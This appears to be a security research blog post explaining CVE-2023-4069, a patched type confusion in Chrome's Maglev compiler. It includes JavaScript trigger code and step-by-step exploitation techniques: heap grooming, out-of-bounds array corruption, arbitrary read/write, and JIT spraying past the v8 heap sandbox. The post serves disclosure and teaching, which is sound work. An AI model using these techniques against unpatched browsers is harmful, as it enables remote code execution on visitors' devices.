Getting RCE in Chrome with incomplete object initialization in the Maglev compiler
In this post, I’ll exploit CVE-2023-4069, a type confusion in Chrome that allows remote code execution (RCE) in the renderer sandbox of Chrome by a single visit to a malicious site.
In this post I’ll exploit CVE-2023-4069, a type confusion vulnerability that I reported in July 2023. The vulnerability—which allows remote code execution (RCE) in the renderer sandbox of Chrome by a single visit to a malicious site—is found in v8, the Javascript engine of Chrome. It was filed as bug 1465326 and subsequently fixed in version 115.0.5790.170/.171.
Vulnerabilities like this are often the starting point for a “one-click” exploit, which compromises the victim’s device when they visit a malicious website. What’s more, renderer RCE in Chrome allows an attacker to compromise and execute arbitrary code in the Chrome renderer process. That being said, the renderer process has limited privilege and such a vulnerability needs to be chained with a second “sandbox escape” vulnerability (either another vulnerability in the Chrome browser process or one in the operating system) to compromise Chrome itself or the device.
While many of the most powerful and sophisticated “one-click” attacks are highly targeted, and average users may be more at risk from less sophisticated attacks such as phishing, users should still keep Chrome up-to-date and enable automatic updates, as vulnerabilities in v8 can often be exploited relatively quickly.
The current vulnerability, CVE-2023-4069, exists in the Maglev compiler, a new mid-tier JIT compiler in Chrome that optimizes Javascript functions based on previous knowledge of the input types. This kind of optimization is called speculative optimization and care must be taken to make sure that these assumptions on the inputs are still valid when the optimized code is used. The complexity of the JIT engine has led to many security issues in the past and has been a popular target for attackers.
Maglev compiler
The Maglev compiler is a mid-tier JIT compiler used by v8. Compared to the top-tier JIT compiler, TurboFan, Maglev generates less optimized code but with a faster compilation speed. Having multiple JIT compilers is common in Javascript engines, the idea being that with multiple tier compilers, you’ll find a more optimal tradeoff between compilation time and runtime optimization.
Generally speaking, when a function is first run, slow bytecode is generated, as the function is run more often, it may get compiled into more optimized code, first from a lowest-tier JIT compiler. If the function gets used more often, then its optimization tier gets moved up, resulting in better runtime performance—but at the expense of a longer compilation time. The idea here is that for code that runs often, the runtime cost will likely outweigh the compile time cost. You can consult An Introduction to Speculative Optimization in v8 by Benedikt Meurer for more details of how the compilation process works.
The Maglev compiler is enabled by default starting from version 114 of Chrome. Similar to TurboFan, it goes through the bytecode of a Javascript function, taking into account the feedback that was collected from previous runs, and transforms the bytecode into more optimized code. However, unlike TurboFan, which first transforms bytecodes into a “Sea of Nodes”, Maglev uses an intermediate representation and first transforms bytecodes into SSA (Static Single-Assignment) nodes, which are declared in the file maglev-ir.h. At the time of writing, the compilation process of Maglev consists mainly of two phases of optimizations: the first phase involves building a graph from the SSA nodes, while the second phase consists of optimizing the representations of Phi values.
Object construction in v8
The bug in this post really has more to do with object constructions than with Maglev, so now I’ll go through more details and some concepts of how v8 handles Javascript constructions. A Javascript function can be used as a constructor and called with the new
keyword. When it is called with new
, the new.target
variable exists in the function scope that specifies the function being called with new
. In the following case, new.target
is the same as the function itself.
function foo() {
%DebugPrint(new.target);
}
new foo(); // foo
foo(); // undefined
This, however, is not always the case and new.target
may be different from the function itself. For example, in case of a construction via a derived constructor:
class A {
constructor() {
%DebugPrint(new.target);
}
}
class B extends A {
}
new A(); // A
new B(); // B
Another way to have a different new.target
is to use the Reflect.construct
built-in function:
Reflect.construct(A, [], B); // B
The signature of Reflect.construct
is as follows, which specifies newTarget
as the new.target
:
Reflect.construct(target, argumentsList, newTarget)
The Reflect.construct
method sheds some light on the role of new.target
in object construction. According to the documentation, target
is the constructor that is actually executed to create and initialize an object, while newTarget
provides the prototype
for the created object. For example, the following creates a Function
type object and only Function
is called.
var x = Reflect.construct(Function, [], Array);
This is consistent with construction via class inheritance:
class A {}
class B extends A {}
var x = new B();
console.log(x.__proto__ == B.prototype); //<--- true
Although in this case, the derived constructor B
does get called. So what is the object that’s actually created? For functions that actually return a value, or for class constructors, the answer is more clear:
function foo() {return [1,2];}
function bar() {}
var x = Reflect.construct(foo, [], bar); //<--- returns [1,2]
but less so otherwise:
function foo() {}
function bar() {}
var x = Reflect.construct(foo, [], bar); //<--- returns object {}, instead of undefined
So even if a function does not return an object, using it as target
in Reflect.construct
still creates a Javascript object. Roughly speaking, object constructions follow these steps: (see, for example, Generate_JSConstructStubGeneric
.)
First a default receiver
(the this
object) is created using FastNewObject
, and then the target
function is invoked. If the target
function returns an object, then the default receiver
is discarded and the return value of target
is used as the returned object instead; otherwise, the default receiver
is returned.
Default receiver
object
The default receiver
object created by FastNewObject
is relevant to this bug, so I’ll explain it in a bit more detail. Most Javascript functions contain an internal field, initial_map
. This is a Map
object that determines the type and the memory layout of the default receiver
object created by this function. In v8, Map
determines the hidden type of an object, in particular, its memory layout and the storage of its fields. Readers can consult “JavaScript engine fundamentals: Shapes and Inline Caches” by Mathias Bynens to get a high-level understanding of object types and maps.
When creating the default receiver
object, FastNewObject
will try to use the initial_map
of new.target
(new_target
) as the Map
for the default receiver
:
TNode ConstructorBuiltinsAssembler::FastNewObject(
TNode context, TNode target,
TNode new_target, Label* call_runtime) {
// Verify that the new target is a JSFunction.
Label end(this);
TNode new_target_func =
HeapObjectToJSFunctionWithPrototypeSlot(new_target, call_runtime);
...
GotoIf(DoesntHaveInstanceType(CAST(initial_map_or_proto), MAP_TYPE),
call_runtime);
TNode
This is curious, as the default receiver
should have been created using target
and new_target
should only be used to set its prototype
. The reason for this is because of an optimization that caches both the initial_map
of target
and the prototype
of new_target
in the initial_map
of new_target
, which I’ll explain now.
In the above, FastNewObject
has a check (marked as “check” in the above snippet) that makes sure that target
is the same as the constructor
field of the initial_map
. For most functions, initial_map
is created lazily, or its constructor
field is pointing to itself (new_target
in this case). So when new_target
is first used to construct an object with a different target
, the call_runtime
slow path is likely taken, which uses JSObject::New
:
MaybeHandle JSObject::New(Handle constructor,
Handle new_target,
Handle site) {
...
Handle
This function calls GetDerivedMap
, which may call FastInitializeDerivedMap
to create an initial_map
in the new_target
:
bool FastInitializeDerivedMap(Isolate* isolate, Handle new_target,
Handle constructor,
Handle
The initial_map
created here is a copy of the initial_map
of target
(constructor
), but with its prototype
set to the prototype
of new_target
and its constructor
set to target
. This is the only case when the constructor
of an initial_map
points to a function other than itself and provides the context for the initial_map
of new_target
to be used in FastNewObject
: if the constructor
of an initial_map
points to a different function, then the initial_map
is a copy of the initial_map
of the constructor
. Checking that new_target.initial_map.constructor
equals target
, FastNewObject
ensures that the initial_map
of new_target
is a copy of target.initial_map
, but with new_target.prototype
as its prototype
, which is the correct Map
to use.
The vulnerability
Derived classes often have no-op default constructors, which do not modify receiver
objects, for example:
class A {}
class B extends A {}
class C extends B {}
const o = new C();
In this case, when calling new C()
, the default constructor calls to B
and A
are no-op and can be omitted. The FindNonDefaultConstructorOrConstruct
bytecode is an optimization to omit redundant calls to no-op default constructors in these cases. In essence, it walks up the chain of super constructors and skips the default constructors that can be omitted. If it can skip all the intermediate default constructors and reach the base constructor, then FastNewObject
is called to create the default receiver
object. The bytecode is introduced in a derived class constructor:
class A {}
class B extends A {}
new B();
Running the above with the print-bytecode
flag in d8
(the standalone version of v8), I can see that FindNonDefaultConstructorOrConstruct
is inserted in the bytecode of the derived constructor B
:
[generated bytecode for function: B (0x1a820019ba41 )]
Bytecode length: 45
Parameter count 1
Register count 7
Frame size 56
0x1a820019be6c @ 0 : 19 fe f9 Mov , r1
1700 S> 0x1a820019be6f @ 3 : 5a f9 fa f5 FindNonDefaultConstructorOrConstruct r1, r0, r5-r6
...
0x1a820019be7e @ 18 : 99 0c JumpIfTrue [12] (0x1a820019be8a @ 30)
...
0x1a820019be8a @ 30 : 0b 02 Ldar
0x1a820019be8c @ 32 : ad ThrowSuperAlreadyCalledIfNotHole
0x1a820019be8d @ 33 : 19 f7 02 Mov r3,
1713 S> 0x1a820019be90 @ 36 : 0d 01 LdaSmi [1]
1720 E> 0x1a820019be92 @ 38 : 32 02 00 02 SetNamedProperty , [0], [2]
0x1a820019be96 @ 42 : 0b 02 Ldar
1727 S> 0x1a820019be98 @ 44 : aa Return
In particular, if FindNonDefaultConstructorOrConstruct
succeeds (returns true
), then the default receiver
object will be returned immediately.
The vulnerability happens in the handling of FindNonDefaultConstructorOrConstruct
in Maglev.
void MaglevGraphBuilder::VisitFindNonDefaultConstructorOrConstruct() {
...
compiler::OptionalHeapObjectRef new_target_function =
TryGetConstant(new_target);
if (kind == FunctionKind::kDefaultBaseConstructor) {
ValueNode* object;
if (new_target_function && new_target_function->IsJSFunction()) {
object = BuildAllocateFastObject(
FastObject(new_target_function->AsJSFunction(), zone(),
broker()),
AllocationType::kYoung);
...
If it manages to skip all the default constructors and reach the base constructor, then it’ll check whether new_target
is a constant. If that is the case, then BuildAllocateFastObject
, instead of FastNewObject
, is used to create the receiver
object. The problem is that, unlike FastNewObject
, BuildAllocateFastObject
uses the initial_map
of new_target
without checking its constructor
field:
ValueNode* MaglevGraphBuilder::BuildAllocateFastObject(
FastObject object, AllocationType allocation_type) {
...
ValueNode* allocation = ExtendOrReallocateCurrentRawAllocation(
object.instance_size, allocation_type);
BuildStoreReceiverMap(allocation, object.map); // new_target.initial_map
...
return allocation;
}
Why is this bad? As explained before, when constructing an object, target
, rather than new_target
, is called to initialize the object fields. If new_target
is not of the same type as target
, then creating an object with the initial_map
of new_target
can leave fields uninitialized:
class A {}
class B extends A {}
var x = Reflect.construct(B, [], Array);
In this case, new_target
is Array
, so if the initial_map
of new_target
is used to create x
(receiver
), then x
is going to be an Array
type object, which has a field length
that specifies the size of the array and is used for bounds checking. If B
, which is the target
, is used to initialize the Array
object, then length
would become uninitialized. This problematic scenario is prevented by checking the constructor
of new_target.initial_map
to make sure that it is B
, and the absence of the check in Maglev results in the vulnerability.
There is one problem here: I need new_target
to be a constant to reach this code, but when used with Reflect.construct
, new_target
is an argument to the function and is never going to be a constant. To overcome this, let’s take a look at what TryGetConstant
, which is used in FindNonDefaultConstructorOrConstruct
to check that new_target
is a constant, does:
compiler::OptionalHeapObjectRef MaglevGraphBuilder::TryGetConstant(
ValueNode* node, ValueNode** constant_node) {
if (auto result = TryGetConstant(broker(), local_isolate(), node)) { //<--- 1.
if (constant_node) *constant_node = node;
return result;
}
const NodeInfo* info = known_node_aspects().TryGetInfoFor(node); //is_constant()) {
if (constant_node) *constant_node = info->constant_alternative;
return TryGetConstant(info->constant_alternative);
}
return {};
}
When checking whether a node is constant, TryGetConstant
first checks if the node is a known global constant (marked as 1. in the above), which will be false in our case. However, it also checks NodeInfo
for the node to see if it has been marked as a constant by other nodes (marked as 2. in the above). If the value of the node has been checked against a global constant previously, then its NodeInfo
will be set to a constant. If that’s the case, then I can store new.target
to a global variable that has not been changed, which will cause Maglev to insert a CheckValue node to ensure that new.target
is the same as the global constant:
class A {}
var x = Array;
class B extends A {
constructor() {
x = new.target; //<--- insert CheckValue node to cache new.target as constant (Array)
super();
}
}
Reflect.construct(B, [], Array); //<--- Calls `B` as `target` and `Array` as `new_target`
When B
is optimized by Maglev and the optimized code is run, Reflect.construct
is likely to return an Array
with length
0
. This is because initially, the free spaces in the heap mostly contain zeroes, so when the created Array
uses an uninitialized value as its length
, this value is most likely going to be zero. However, once a garbage collection is run, the free spaces in the heap will likely contain some non-trivial values (objects that are freed by garbage collection). By creating some objects in the heap, deleting them, and then triggering a garbage collection, I could carefully arrange the heap to make the uninitialized Array
created through the bug take any value as its length
. In practice, a rather crude trial-and-error approach (which mostly involves triggering a garbage collection and creating uninitialized Array
with the bug until you get it right) is sufficient to give me consistent and reliable results:
//----- Create incorrect Maglev code ------
var x = Array;
class B extends A {
constructor() {
x = new.target;
super();
}
}
function construct() {
var r = Reflect.construct(B, [], x);
return r;
}
//Compile optimize code
for (let i = 0; i < 2000; i++) construct();
//-----------------------------------------
//Trigger garbage collection to fill the free space of the heap
new ArrayBuffer(gcSize);
new ArrayBuffer(gcSize);
corruptedArr = construct(); // length of corruptedArr is 0, try again...
corruptedArr = construct(); // length of corruptedArr takes the pointer of an object, which gives a large value
While this already allows out-of-bounds (OOB) access to a Javascript array, which is often sufficient to gain code execution, the situation is slightly more complicated in this case.
Gaining code execution
The Array
created via the bug has no elements, so its element store is set to the empty_fixed_array
. The main problem is that empty_fixed_array
is located in a read-only region of the v8 heap, which means that an OOB write needs to be large enough to pass the entire read-only heap or it’ll just crash on access:
DebugPrint: 0x10560004d5e5: [JSArray]
- map: 0x10560018ed39 [FastProperties]
- prototype: 0x10560018e799
- elements: 0x105600000219 [HOLEY_SMI_ELEMENTS] //<------- address of empty_fixed_array
...
As you can see above, the lower 32 bits of the address of empty_fixed_array
is 0x219
, which is fairly small. The lower 32 bits of the address is called the compressed address. In v8, most references are only stored as the lower 32 bits of the full 64-bit pointers in the heap, while the higher 32 bits remain constant and are cached in a register. In particular, v8 objects are referenced using the compressed address and this is an optimization called pointer compression.
As explained in Section “Bypassing the need to get an infoleak” of my other post, the addresses of many objects are very much constant in v8 and depend only on the software version. In particular, the address of empty_fixed_array
is the same across different runs and software versions, and more importantly, it remains a small address. This means most v8 objects are going to be placed at an address larger than that of the empty_fixed_array
. In particular, with a large enough length
, it is possible to access any v8 object.
While at least in theory, this bug can be used to exploit, it is still unclear how I can use this to access and modify a specific object of my choice. Although I can use the uninitialized Array
created by the bug to search through all objects that are allocated behind empty_fixed_array
, doing so is inefficient and I may end up accessing some invalid objects that could result in a crash. It would be good if I can at least have an idea of the addresses for objects that I created in Javascript.
In a talk that I gave at the POC2022 conference last year, I shared how object addresses in v8 can indeed be predicted accurately by simply knowing the version of Chrome. What I didn’t know then was that, even after a garbage collection, object addresses can still be predicted reliably.
//Triggers garbage collection
new ArrayBuffer(gcSize);
new ArrayBuffer(gcSize);
corruptedArr = construct();
corruptedArr = construct();
var oobDblArr = [0x41, 0x42, 0x51, 0x52, 1.5]; //<---- address remains consisten across runs
For example, in the above situation, the object oobDblArr
created after garbage collection remains in the same address fairly consistently across different runs. While the address can sometimes change slightly, it is sufficient to give me a rough starting point to search for oobDblArr
in corruptedArr
(the Array
created from the bug). With this, I can corrupt the length of oobDblArr
to gain an OOB access with oobDblArr
. The exploit flow is now very similar to the one described in my previous post, and consists of the following steps:
- Place an
Object
Array
,oobObjArr
afteroobDblArr
, and use the OOB read primitive to read the addresses of the objects stored in this array. This allows me to obtain the address of any v8 object. - Place another double array,
oobDblArr2
afteroobDblArr
, and use the OOB write primitive inoobDblArr
to overwrite theelement
field ofoobDblArr2
to an object address. Accessing the elements ofoobDblArr2
then allows me to read/write to arbitrary addresses. - While this gives me arbitrary read and write primitives within the v8 heap and also obtains the address of any object, due to the recently introduced heap sandbox in v8, the v8 heap is fairly isolated and it still can’t access arbitrary memory within the renderer process. In particular, I can no longer use the standard method of overwriting the
RWX
pages that are used for storing Web Assembly code to achieve code execution. Instead, JIT spraying can be used to bypass the heap sandbox. - The idea of JIT spraying is that a pointer to the JIT optimized code of a function is stored in a Javascript
Function
object, by modifying this pointer using arbitrary read and write primitive within the v8 heap, I can make this pointer jump to the middle of the JIT code. If I use data structures, such as a double array, to store shell code as floating point numbers in the JIT code, then jumping to these data structures will allow me to execute arbitrary code. I refer readers to this post for more details.
The exploit can be found here with some set up notes.
Conclusion
With different tiers of optimizations in Chrome, the same functionality often needs to be implemented multiple times, each with different and specific optimization considerations. For complex routines that rely on subtle assumptions, this can result in security problems when porting code between different optimizations, as we have seen in this case, where the implementation of FindNonDefaultConstructorOrConstruct
has missed out an important check.
Tags:
Written by
Related posts
Execute commands by sending JSON? Learn how unsafe deserialization vulnerabilities work in Ruby projects
Can an attacker execute arbitrary commands on a remote server just by sending JSON? Yes, if the running code contains unsafe deserialization vulnerabilities. But how is that possible? In this blog post, we’ll describe how unsafe deserialization vulnerabilities work and how you can detect them in Ruby projects.
10 years of the GitHub Security Bug Bounty Program
Let’s take a look at 10 key moments from the first decade of the GitHub Security Bug Bounty program.
Where does your software (really) come from?
GitHub is working with the OSS community to bring new supply chain security capabilities to the platform.